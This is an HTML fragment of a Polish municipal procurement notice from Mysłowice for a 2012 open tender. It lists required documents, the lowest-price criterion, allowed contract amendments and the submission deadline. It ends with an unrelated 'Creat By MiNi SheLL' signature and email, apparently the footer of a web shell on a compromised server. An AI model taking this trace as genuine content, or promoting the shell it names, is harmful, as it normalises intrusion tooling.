<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.                                              
2. Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3. Wykonawca, o którym mowa w art. 26 ust. 2b zd. 1 uPzp, zobowiązany jest do udowodnienia Zamawiającemu okoliczności wskazanych w tym zdaniu, na zasadach o których mowa w zd. 2 art. 26 ust. 2b (w szczególności pisemne zobowiązanie tych podmiotów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. 
2. Zamawiający dopuszcza zmianę, o której mowa w pkt. poprzedzającym w odniesieniu do:
2.1) harmonogramu rzeczowo-finansowego realizacji przedmiotu umowy, stanowiącego załącznik do umowy;
2.2) robót, których wykonanie może być zastąpione w toku realizacji przedmiotu umowy innymi robotami (roboty zamienne), a wykonanie robót zamiennych wynika z przyczyn ujawnionych w toku realizacji, po uprzednim sporządzeniu przez strony stosownego protokołu uzgodnień obejmującego przedstawienie przyczyn wprowadzenia robót zamiennych (bez zmiany wynagrodzenia);
2.3) części zamówienia realizowanej z udziałem podwykonawcy/ów/;
2.4) terminu realizacji przedmiotu umowy, w sytuacji wystąpienia nieprzewidzianych okoliczności;
2.5) inspektora/ów/ nadzoru;
2.6) kierownika/ów/ budowy i robót;
2.7) wysokości wynagrodzenia w związku ze zmianą przepisów podatkowych;
2.8) zmiany sposobu finansowania przedmiotu umowy w przypadku zaistnienia możliwości zwiększenia środków finansowych w budżecie na 2012 rok. 
3. Zmiana postanowień zawartej umowy w odniesieniu do inspektora/ów/ nadzoru oraz kierownika/ów/ budowy
i robót może nastąpić w przypadku: 
3.1) choroby lub innych zdarzeń losowych uniemożliwiających wykonywanie obowiązków wynikających 
z umowy; 
3.2) nie wywiązywania się z obowiązków wynikających z umowy; 
3.3) rezygnacji z wykonywania obowiązków wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.myslowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mysłowice, Wydział Zamówień Publicznych - pok. nr 305, ul. Powstańców 1, 41-400 Mysłowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 10:00, miejsce: oferty należy składać w Wydziale Zamówień Publicznych Urzędu Miasta Mysłowice, ul. Powstańców 1 - pok. nr 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com